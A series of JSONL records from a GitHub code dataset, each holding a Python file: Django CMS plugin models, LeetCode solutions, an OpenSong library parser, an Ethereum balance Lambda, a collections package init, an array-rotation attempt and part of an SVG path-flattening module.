verbose_name=_(\"Number\"),\n default=5,\n blank=False,\n null=False,\n help_text=_(\n \"How many brand's logo to be show at the same time.\"\n )\n )\n\n\n# ===---\n\n\nclass dmBlocEntete(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n\n\nclass dmBlocTextMedia(CMSPlugin):\n CHOIX_POSITION = [\n (0, _(\"Left\")),\n (1, _(\"Right\"))\n ]\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n subtitle = models.CharField(\n verbose_name=_(\"Subtitle\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMBLOCKPLUGIN\",\n null=True,\n blank=True\n )\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_textmedia_image\",\n null=True,\n blank=True,\n help_text=_(\"Sizes : 398x531. 
Leave blank to hide image.\")\n )\n video = FilerFileField(\n verbose_name=_(\"Video\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_textmedia_video\",\n null=True,\n blank=True,\n help_text=_(\"Leave blank to hide or use image instead.\")\n )\n text_align = models.BooleanField(\n verbose_name=_(\"Align text and media vertically?\"),\n default=True\n )\n colposition = models.PositiveSmallIntegerField(\n verbose_name=_(\"Image's Position\"),\n choices=CHOIX_POSITION,\n default=1,\n null=False,\n blank=False\n )\n\n\nclass dmBlocTextCarrousel(CMSPlugin):\n CHOIX_POSITION = [\n (0, _(\"Left\")),\n (1, _(\"Right\"))\n ]\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n subtitle = models.CharField(\n verbose_name=_(\"Subtitle\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMBLOCKPLUGIN\",\n null=True,\n blank=True\n )\n text_align = models.BooleanField(\n verbose_name=_(\"Align text and media vertically?\"),\n default=True\n )\n colposition = models.PositiveSmallIntegerField(\n verbose_name=_(\"Image's Position\"),\n choices=CHOIX_POSITION,\n default=1,\n null=False,\n blank=False\n )\n howmany_image = models.PositiveSmallIntegerField(\n verbose_name=_(\"How Many Images?\"),\n default=1,\n help_text=_(\"How many images to show at the same time on desktop.\")\n )\n crop_image = models.BooleanField(\n verbose_name=_(\"Crop Image?\"),\n default=False,\n help_text=_(\"If checked, will crop images to fit the same ratio.\")\n )\n see_dots = models.BooleanField(\n verbose_name=_(\"Show Dots?\"),\n default=False,\n help_text=_(\n \"If checked, will display dots under carrousel for each image.\"\n )\n )\n see_navs = models.BooleanField(\n verbose_name=_(\"Show Navigation Arrows?\"),\n default=True,\n help_text=_(\n \"If checked, will display navigation \\\n arrows both sides of the carrousel.\"\n )\n )\n\n\nclass dmBlocTextCarrouselImage(CMSPlugin):\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.CASCADE,\n related_name=\"dmplugin_textcarrousel_image\",\n null=False,\n blank=False,\n help_text=_(\n \"Max sizes : 600x600. 
Always \\\n use the same ratio on the same carrousel.\"\n )\n )\n\n\nclass dmBlocText2Column(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n subtitle = models.CharField(\n verbose_name=_(\"Subtitle\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text_left = HTMLField(\n verbose_name=_(\"Left Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMBLOCKPLUGIN\",\n null=True,\n blank=True\n )\n text_right = HTMLField(\n verbose_name=_(\"Right Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMBLOCKPLUGIN\",\n null=True,\n blank=True\n )\n text_align = models.BooleanField(\n verbose_name=_(\"Align texts vertically?\"),\n default=False\n )\n\n\nclass dmBlocEnteteVideo(CMSPlugin):\n videofile = FilerFileField(\n verbose_name=_(\"Video File\"),\n on_delete=models.CASCADE,\n null=False,\n blank=False,\n help_text=_(\"Prioritize .mp4 format.\")\n )\n\n\nclass dmBlocSliderParent(CMSPlugin):\n height = models.PositiveSmallIntegerField(\n verbose_name=_(\"Height\"),\n default=500,\n help_text=_(\n \"Height of the slider \\\n (will be automatically shrinked on mobile version).\"\n )\n )\n\n\nclass dmBlocSliderChild(CMSPlugin):\n CHOICE_POS_TEXT = [\n (1, _(\"Left\")),\n (2, _(\"Middle\")),\n (3, _(\"Right\"))\n ]\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n suptitle = models.CharField(\n verbose_name=_(\"Suptitle\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n subtitle = models.CharField(\n verbose_name=_(\"Subtitle\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n title_color = ColorField(\n verbose_name=_(\"Title's Colour\"),\n null=True,\n blank=True\n )\n suptitle_color = ColorField(\n verbose_name=_(\"Suptitle's Colour\"),\n null=True,\n blank=True\n )\n subtitle_color = ColorField(\n verbose_name=_(\"Subtitle's Colour\"),\n null=True,\n blank=True\n )\n position_text = models.PositiveSmallIntegerField(\n verbose_name=_(\"Text's Position\"),\n choices=CHOICE_POS_TEXT,\n default=3\n )\n btn_label = models.CharField(\n verbose_name=_(\"Link's Label\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 255 characters.\")\n )\n btn_url = models.CharField(\n verbose_name=_(\"URL\"),\n max_length=1000,\n blank=True,\n null=True,\n help_text=_(\"Facultative. Maximum 1 000 characters.\")\n )\n btn_blank = models.BooleanField(\n verbose_name=_(\"Open on new tab?\"),\n default=False\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_sliderchild_image\",\n null=True,\n blank=True,\n help_text=_(\"Maximum size: 1920x900. 
Leave blank to hide image.\")\n )\n\n\nclass dmBlocContact(CMSPlugin):\n horaire_top = models.CharField(\n verbose_name=_(\"Schedule - Top\"),\n max_length=50,\n null=False,\n blank=False,\n help_text=_(\"Maximum 50 characters.\")\n )\n horaire_bot = models.CharField(\n verbose_name=_(\"Schedule - Bottom\"),\n max_length=50,\n null=False,\n blank=False,\n help_text=_(\"Maximum 50 characters.\")\n )\n phone_top = models.CharField(\n verbose_name=_(\"Phone - Top\"),\n max_length=50,\n null=False,\n blank=False,\n help_text=_(\"Maximum 50 characters.\")\n )\n phone_bot = models.CharField(\n verbose_name=_(\"Phone - Bottom\"),\n max_length=50,\n default=\"Call Us\",\n null=False,\n blank=False,\n help_text=_(\"Maximum 50 characters.\")\n )\n where_top = models.CharField(\n verbose_name=_(\"Address - Top\"),\n max_length=120,\n null=False,\n blank=False,\n help_text=_(\"Maximum 120 characters.\")\n )\n where_bot = models.CharField(\n verbose_name=_(\"Address - Bottom\"),\n max_length=50,\n default=\"Our Address\",\n null=False,\n blank=False,\n help_text=_(\"Maximum 50 characters.\")\n )\n link_label = models.CharField(\n verbose_name=_(\"Button's Label\"),\n max_length=50,\n default=\"Contact Us\",\n null=False,\n blank=False,\n help_text=_(\"Maximum 50 characters.\")\n )\n text_color = ColorField(\n verbose_name=_(\"Text's Colour\"),\n null=True,\n blank=True\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n\n\nclass dmInfolettre(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 255 characters.\")\n )\n title_color = ColorField(\n verbose_name=_(\"Title's Colour\"),\n null=True,\n blank=True\n )\n subtitle = models.CharField(\n verbose_name=_(\"Subtitle\"),\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 1000 characters.\")\n )\n subtitle_color = ColorField(\n verbose_name=_(\"Subtitle's Colour\"),\n null=True,\n blank=True\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True,\n help_text=_(\"Facultative.\")\n )\n text_color = ColorField(\n verbose_name=_(\"Text's Colour\"),\n null=True,\n blank=True\n )\n label = models.CharField(\n verbose_name=_(\"Button's Label\"),\n max_length=255,\n default=\"Subscribe to our newsletter\",\n null=False,\n blank=False,\n help_text=_(\"Maximum 255 characters.\")\n )\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_infolettre_image\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 2000x900. 
Leave blank to hide image.\")\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n\n\nclass dmBlocEtapesParent(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n subtitle = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n\n\nclass dmBlocEtapesChild(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = models.CharField(\n verbose_name=_(\"Text\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_etapeschild_image\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 160x160.\")\n )\n\n\nclass dmBlockSalesParent(CMSPlugin):\n CHOIX_PERLINE = [\n (1, _(\"1 block\")),\n (2, _(\"2 blocks\")),\n (3, _(\"3 blocks\"))\n ]\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n perline = models.PositiveSmallIntegerField(\n verbose_name=_(\"How many block per line?\"),\n choices=CHOIX_PERLINE,\n default=2,\n null=False,\n blank=False\n )\n\n\nclass dmBlockSalesChild(CMSPlugin):\n CHOIX_POSITION = [\n (0, _(\"Left\")),\n (1, _(\"Right\"))\n ]\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Maximum 1000 characters.\")\n )\n text = models.CharField(\n verbose_name=_(\"Text\"),\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Maximum 1000 characters.\")\n )\n txt_color = ColorField(\n verbose_name=_(\"Text's Colour\"),\n default=\"#292b2c\"\n )\n text_position = models.PositiveSmallIntegerField(\n verbose_name=_(\"Text's Position\"),\n choices=CHOIX_POSITION,\n default=1,\n null=False,\n blank=False\n )\n btn_label = models.CharField(\n verbose_name=_(\"Button's Label\"),\n max_length=100,\n null=True,\n blank=True,\n help_text=_(\"Maximum 100 characters.\")\n )\n btn_url = models.CharField(\n verbose_name=_(\"Button's URL\"),\n max_length=1000,\n null=True,\n blank=True\n )\n btn_text_color = ColorField(\n verbose_name=_(\"Button Text's Colour\"),\n default=\"#292b2c\"\n )\n btn_border_color = ColorField(\n verbose_name=_(\"Button Border's Colour\"),\n null=True,\n blank=True,\n help_text=_(\"Leave blank to use transparent.\")\n )\n btn_bg_color = ColorField(\n verbose_name=_(\"Button Background's Colour\"),\n null=True,\n blank=True,\n help_text=_(\"Leave blank to use transparent.\")\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n default=\"#f2f2f3\"\n )\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_saleschild_image\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. 
Size: 540x300.\")\n )\n\n\nclass dmBlockCalltoaction(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Maximum 1000 characters.\")\n )\n subtitle = models.CharField(\n verbose_name=_(\"Subtitle\"),\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Maximum 1000 characters.\")\n )\n text = models.CharField(\n verbose_name=_(\"Text\"),\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Maximum 1000 characters.\")\n )\n title_color = ColorField(\n verbose_name=_(\"Title's Colour\"),\n default=\"#292b2c\"\n )\n subtitle_color = ColorField(\n verbose_name=_(\"Subtitle's Colour\"),\n default=\"#292b2c\"\n )\n text_color = ColorField(\n verbose_name=_(\"Text's Colour\"),\n default=\"#292b2c\"\n )\n btn_label = models.CharField(\n verbose_name=_(\"Button's Label\"),\n max_length=100,\n null=True,\n blank=True,\n help_text=_(\"Maximum 100 characters.\")\n )\n btn_url = models.CharField(\n verbose_name=_(\"Button's URL\"),\n max_length=1000,\n null=True,\n blank=True\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_calltoaction_image\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 420x460.\")\n )\n\n\nclass dmTeamParent(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n\n\nclass dmTeamChild(CMSPlugin):\n name = models.CharField(\n verbose_name=_(\"Name\"),\n max_length=255,\n null=False,\n blank=False,\n help_text=_(\"Maximum 255 characters.\")\n )\n job = models.CharField(\n verbose_name=_(\"Job\"),\n max_length=1000,\n null=True,\n blank=True\n )\n photo = image.FilerImageField(\n verbose_name=_(\"Photo\"),\n related_name=\"team_photo\",\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 255x355.\")\n )\n email = models.EmailField(\n verbose_name=_(\"Email\"),\n max_length=1000,\n null=True,\n blank=True\n )\n facebook = models.URLField(\n verbose_name=\"Facebook\",\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Ex.: https://www.facebook.com/\")\n )\n twitter = models.URLField(\n verbose_name=\"Twitter\",\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Ex.: https://twitter.com/\")\n )\n instagram = models.URLField(\n verbose_name=\"Instagram\",\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Ex.: https://www.instagram.com/\")\n )\n\n\nclass dmTestimonialParent(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n bg_image = image.FilerImageField(\n verbose_name=_(\"Background's Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_testimonialparent_bgimage\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. 
Size: 2000x900.\")\n )\n\n\nclass dmTestimonialChild(CMSPlugin):\n name = models.CharField(\n verbose_name=_(\"Name\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n name_color = ColorField(\n verbose_name=_(\"Name's Colour\"),\n default=\"#292b2c\"\n )\n job = models.CharField(\n verbose_name=_(\"Job\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n job_color = ColorField(\n verbose_name=_(\"Job's Colour\"),\n default=\"#292b2c\"\n )\n photo = image.FilerImageField(\n verbose_name=_(\"Photo\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_testimonialchild_photo\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 120x120.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n","repo_name":"dmodules/d-shop","sub_path":"dshop/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":73137,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"8225622544","text":"# 287. Find the Duplicate Number\n# Medium\n\n# Given an array nums containing n + 1 integers where each integer is between 1 and n (inclusive), prove that at least one duplicate number must exist. Assume that there is only one duplicate number, find the duplicate one.\n\n# Example 1:\n\n# Input: [1,3,4,2,2]\n# Output: 2\n# Example 2:\n\n# Input: [3,1,3,4,2]\n# Output: 3\n\n## I ##\nclass Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # Cyclic Sort\n i = 0\n while i < len(nums):\n # What number is expected at i?\n expected = i + 1\n if expected != nums[i]:\n # What index should the number be at?\n index = nums[i] - 1\n if nums[index] != nums[i]: # swap\n nums[index], nums[i] = nums[i], nums[index]\n else: # Found the duplicate\n return nums[i]\n else:\n i += 1\n\n return -1\n\n## II ##\nclass Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # Floyd's Algorithm\n tortoise, hare = nums[0], nums[0]\n\n while True:\n tortoise = nums[tortoise]\n hare = nums[nums[hare]]\n\n if tortoise == hare:\n break\n\n ptr1 = nums[0]\n ptr2 = tortoise\n\n while ptr1 != ptr2:\n ptr1 = nums[ptr1]\n ptr2 = nums[ptr2]\n\n return ptr1\n","repo_name":"atolat/algorithms-lc","sub_path":"Strings-Arrays/Cyclic Sort/duplicate-number.py","file_name":"duplicate-number.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14951999950","text":"#!/usr/bin/env python3\nimport os\nfrom xml.etree import ElementTree as ET\nfrom datetime import datetime\n\n\nclass Set():\n name = ''\n path = ''\n songs = []\n\n def __repr__(self):\n return '{}, {}, {}'.format(self.name, self.path, self.songs)\n\n def __init__(self, setpath):\n # print('opening set:', setpath)\n if not os.path.exists(setpath):\n return\n xml = ET.parse(setpath)\n root = xml.getroot()\n self.path = setpath\n self.name = root.attrib['name']\n self.songs = []\n slide_groups = xml.find('slide_groups')\n for slide_group in slide_groups:\n songpath = ''\n if slide_group.attrib['type'] == 'song':\n name = slide_group.attrib['name']\n try:\n subdir = slide_group.attrib['path']\n except:\n subdir = ''\n if subdir != '':\n songpath = os.path.join(songsdir, subdir, name)\n else:\n songpath = os.path.join(songsdir, name)\n if songpath 
!= '':\n # print(songpath)\n song = Song(songpath)\n # print(song.name)\n if (song.name != ''):\n self.songs.append(song)\n # print(self.name)\n # print(self.songs)\n\n\nclass Song():\n path = ''\n lyrics = ''\n name = ''\n ccli = ''\n data = {}\n\n def __init__(self, songpath):\n # print('opening song:', songpath)\n if not os.path.exists(songpath):\n return\n xml = ET.parse(songpath)\n song = xml.getroot()\n self.path = songpath\n\n self.data = {}\n for element in song:\n # print(element.tag)\n # print(element.text)\n # print(element.attrib)\n self.data[element.tag] = element.text\n self.name = self.data['title']\n self.lyrics = self.data['lyrics']\n self.ccli = self.data['ccli']\n\n\nclass SongFolder():\n path = ''\n songs = []\n subfolders = []\n name = ''\n\n def __init__(self, folderpath):\n self.path = folderpath\n self.name = os.path.basename(folderpath)\n # fresh per-instance lists: the class-level defaults above are shared\n # between instances and would accumulate every folder's contents\n self.songs = []\n self.subfolders = []\n if not os.path.exists(folderpath):\n return\n\n for item in os.listdir(self.path):\n if '.' == item[0]:\n continue\n fp = os.path.join(self.path, item)\n if os.path.isdir(fp):\n self.subfolders.append(SongFolder(fp))\n else:\n self.songs.append(Song(fp))\n\n\nclass Library():\n sets = {}\n songfolder = None\n songstats = {}\n\n def __init__(self, new_librarypath):\n global setsdir\n global songsdir\n self.librarypath = new_librarypath\n self.songs = []  # every Song referenced by any set; filled in below\n\n setsdir = os.path.join(self.librarypath, 'Sets')\n songsdir = os.path.join(self.librarypath, 'Songs')\n self.songfolder = SongFolder(songsdir)\n\n # create sets listing\n for root, dirs, files in os.walk(setsdir):\n for basename in files:\n pathname = os.path.join(root, basename)\n try:\n songset = Set(pathname)\n except:\n # print(\"could not parse\", basename)\n continue\n name = songset.name\n\n try:\n datestamp = datetime.strptime(name, \"%Y-%m-%d\")\n except:\n continue\n if datestamp < datetime.strptime(\"2012-01-01\", \"%Y-%m-%d\"):\n continue\n\n self.sets[datestamp] = songset\n\n for song in songset.songs:\n if song.path == '':\n continue\n self.songs.append(song)\n songpath = song.path\n\n name = os.path.basename(songpath)\n if name not in self.songstats:\n self.songstats[name] = {\n \"uses\": 1, 'author': song.data['author'], 'copyright': song.data['copyright']}\n else:\n self.songstats[name]['uses'] += 1\n","repo_name":"jeffmikels/OpenSongTools","sub_path":"OpenSong.py","file_name":"OpenSong.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"29056447358","text":"import json\nimport urllib3\n\ndef lambda_handler(event, context):\n address = str(event['address']).lower()\n #address = '0xb2930B35844a230f00E51431aCAe96Fe543a0347'\n pool = urllib3.PoolManager()\n params = '{\"jsonrpc\":\"2.0\",\"method\":\"eth_getBalance\",\"params\":[\"' + address + '\", \"latest\"],\"id\":1}'\n \n r = pool.urlopen(\n method='POST', \n url='https://cloudflare-eth.com', \n headers={'Content-Type':'application/json'}, \n body=params\n ).data\n \n # eth_getBalance returns a hex-encoded wei amount; divide by 10**18 for ETH\n return {\n 'balance': int(json.loads(r)[\"result\"], 16)/10**18\n }","repo_name":"lana-shanghai/blockchain-lambda-api","sub_path":"lambda handlers/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"40837888736","text":"import typing as _typing\r\n\r\n\r\nfrom collections import *\r\nfrom collections import abc\r\n\r\n
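# Added note (editor's sketch, not part of the original module): the\r\n# TYPE_CHECKING block further down re-declares __all__ so that, as the\r\n# author's comment there says, static checkers can see the names this\r\n# package re-exports through its star imports; a hypothetical consumer\r\n#\r\n#     from collections_recipes import SQLDict, OrderedSet\r\n#\r\n# then type-checks even though those names arrive via \"import *\".\r\nfrom . 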
import abc_recipes, mapping_recipes\r\nfrom .filedict import *\r\nfrom .collections_recipes import *\r\n \r\n#5/6/2022-14/7/2022 tested with mypy\r\n\r\n\r\n\r\n\r\n\r\nif _typing.TYPE_CHECKING: # to please mypy so it correctly sees the content of the module\r\n __all__ = [\r\n 'LastUpdatedOrderedDict',\r\n 'SerializerDictConfig',\r\n 'collections_recipes',\r\n 'FileSerializerDict',\r\n 'LineSeekableFile',\r\n 'MultiHitLRUCache',\r\n 'constant_factory',\r\n 'mapping_recipes',\r\n 'FileDictPickle',\r\n 'OrderedCounter',\r\n 'SortedSequence',\r\n 'TimeBoundedLRU',\r\n 'moving_average',\r\n 'SQLPickleDict',\r\n 'BaseFileDict',\r\n 'DeepChainMap',\r\n 'FileDictJson',\r\n 'ListBasedSet',\r\n 'FileDictExt',\r\n 'OrderedDict',\r\n 'SQLJsonDict',\r\n 'abc_recipes',\r\n 'defaultdict',\r\n 'FolderDict',\r\n 'OrderedSet',\r\n 'UserString',\r\n 'delete_nth',\r\n 'namedtuple',\r\n 'roundrobin',\r\n 'RangedSet',\r\n 'chr_range',\r\n 'cr_typing',\r\n 'ChainMap',\r\n 'ChainSet',\r\n 'FileDict',\r\n 'UserDict',\r\n 'UserList',\r\n 'filedict',\r\n 'Counter',\r\n 'SQLDict',\r\n 'BitSet',\r\n 'deque',\r\n 'tail',\r\n 'LRU',\r\n 'abc'\r\n ]","repo_name":"copperfield42/copperfield-s-python-libraries","sub_path":"src/collections_recipes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"33293858976","text":"class Solution(object):\n def rotate(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n # rotate right by k, writing the result back into nums so the caller\n # sees the change, as the docstring requires\n n = len(nums)\n k %= n\n nums_temp = nums * 2\n nums[:] = nums_temp[n - k : 2 * n - k]\n\n\nnums = [-1, -100, 3, 99]\nSolution().rotate(nums, 2)\nprint(nums)\n# The judge reads nums in place; returning a fresh list leaves it unchanged,\n# which is why the submitted output differed from the local run.\n","repo_name":"CatCell/note","sub_path":"code/arrDimen1/# rotate.py","file_name":"# rotate.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"26367768106","text":"#!/usr/bin/env python\n\nfrom lxml import etree\n\nfrom .svglib import bezmisc\nfrom .svglib import cubicsuperpath\nfrom .svglib import ffgeom\nfrom .svglib import inkex\nfrom .svglib import simplepath\nfrom .svglib import simpletransform\n\nfrom collections import namedtuple\nPoint_Tuple = namedtuple('Point_Tuple', ('b0', 'b1', 'b2', 'b3'))\nPoint = namedtuple('Point', ('x', 'y'))\n\nimport six\nif six.PY3:\n basestring = str\n\n\nclass SvgEntity(object):\n \"\"\"\n Base class for SVG entities.\n \"\"\"\n def __init__(self, node, node_transform):\n pass\n\n\nclass SvgIgnored(SvgEntity):\n \"\"\"\n An SVG entity which will not be rendered.\n \"\"\"\n def __init__(self, node, node_transform):\n self.tag = node.tag\n\n\nclass SvgPath(SvgEntity):\n \"\"\"\n An SVG entity which will render a segmented line.\n \"\"\"\n def __init__(self, node, node_transform):\n d = node.get('d')\n\n path = simplepath.parsePath(d)\n\n if len(path) == 0:\n return\n \n path = cubicsuperpath.CubicSuperPath(path)\n simpletransform.applyTransformToPath(node_transform, path)\n\n # path is now a list of lists of cubic beziers [ctrl p1, ctrl p2, endpoint]\n # where the start-point is the endpoint of the previous segment\n self.segments = []\n \n for cubic_bezier_path in path:\n points = []\n \n self._subdivide_cubic_bezier_path(cubic_bezier_path, 0.2) # TODO: smoothness preference\n\n for p1, p2, endpoint in cubic_bezier_path:\n points.append(p2)\n \n self.segments.append(points)\n
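\n # Added example (editor's sketch, not from the original file): after\n # __init__ runs, self.segments holds one flattened point list per\n # subpath, each point an [x, y] pair, so a hypothetical plotter could\n # consume the result with nothing more than:\n #\n # for points in svg_path.segments:\n #     pen_move_to(*points[0])   # hypothetical device call\n #     for x, y in points[1:]:\n #         pen_line_to(x, y)     # hypothetical device call\n #\n # pen_move_to/pen_line_to (and svg_path) are assumed names used for\n # illustration only.\n\n def 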
_compute_max_distance(self, points):\n \"\"\"\n Compute the max distance between four points.\n \"\"\"\n ((p0x, p0y), (p1x, p1y), (p2x, p2y), (p3x, p3y)) = points\n\n p0 = ffgeom.Point(p0x, p0y)\n p1 = ffgeom.Point(p1x, p1y)\n p2 = ffgeom.Point(p2x, p2y)\n p3 = ffgeom.Point(p3x, p3y)\n\n s1 = ffgeom.Segment(p0, p3)\n\n return max(s1.distanceToPoint(p1), s1.distanceToPoint(p2))\n\n def _subdivide_cubic_bezier_path(self, cubic_bezier_path, flat):\n \"\"\"\n Break up a bezier curve into smaller curves, each of which\n is approximately a straight line within a given tolerance\n (the \"smoothness\" defined by [flat]).\n\n This is a modified version of Inkscape's cspsubdiv.cspsubdiv().\n The recursive call has been rewritten because it caused\n recursion-depth errors on complicated line segments.\n \"\"\"\n i = 1\n\n while True:\n while True:\n if i >= len(cubic_bezier_path):\n return\n\n # First bezier, first control point \n p0 = cubic_bezier_path[i - 1][1]\n\n # First bezier, endpoint\n p1 = cubic_bezier_path[i - 1][2]\n\n # Second bezier, Second control point\n p2 = cubic_bezier_path[i][0]\n\n # Second bezier, first control point\n p3 = cubic_bezier_path[i][1]\n\n # b = (p0, p1, p2, p3)\n b = Point_Tuple(Point(p0[0], p0[1]), Point(p1[0], p1[1]), Point(p2[0], p2[1]), Point(p3[0], p3[1]))\n\n if self._compute_max_distance(b) > flat:\n break\n\n i += 1\n\n one, two = bezmisc.beziersplitatt(b, 0.5)\n cubic_bezier_path[i - 1][2] = one[1]\n cubic_bezier_path[i][0] = two[2]\n p = [one[2], one[3], two[1]]\n cubic_bezier_path[i:1] = [p]\n\n def new_path_from_node(self, node):\n newpath = etree.Element(inkex.addNS('path', 'svg'))\n\n node_style = node.get('style')\n \n if node_style:\n newpath.set('style', node_style)\n \n transform = node.get('transform')\n \n if transform:\n newpath.set('transform', transform)\n \n return newpath\n\n\nclass SvgRect(SvgPath):\n \"\"\"\n An SVG entity will render a rectangle.\n \"\"\"\n def __init__(self, node, node_transform):\n newpath = 